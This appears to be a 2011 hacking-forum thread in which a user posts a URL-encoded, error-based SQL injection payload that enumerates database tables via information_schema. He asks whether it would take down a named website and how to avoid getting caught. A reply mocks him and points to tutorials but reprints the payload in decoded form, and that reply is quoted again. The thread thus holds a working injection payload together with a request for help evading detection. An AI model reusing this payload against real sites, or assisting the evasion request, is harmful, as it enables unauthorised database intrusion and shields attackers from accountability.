EvilZone

Community => General discussion => : Santa November 06, 2011, 06:43:30 PM

: SQL injection question
: Santa November 06, 2011, 06:43:30 PM
Ok guys i have a question
will the SQL injection

 index.php?lvl=categories&id=453+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6F63696D%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1


work to take down a website site such as ( www. (http://www.thetechgame.com)evilzone.org)
if so what security measures should i take so i dont get caught doing this and what should i download to keep me safe from anything else
: Re: SQL injection question
: ca0s November 06, 2011, 06:54:12 PM
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing to any website with its correspondent logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use google.
Also
:
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.
: Re: SQL injection question
: Santa November 06, 2011, 06:59:50 PM
: ca0s  November 06, 2011, 06:54:12 PM
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing to any website with its correspondent logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use google.
Also
:
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.

No i dont but I want to learn I will check out andes's post when I have time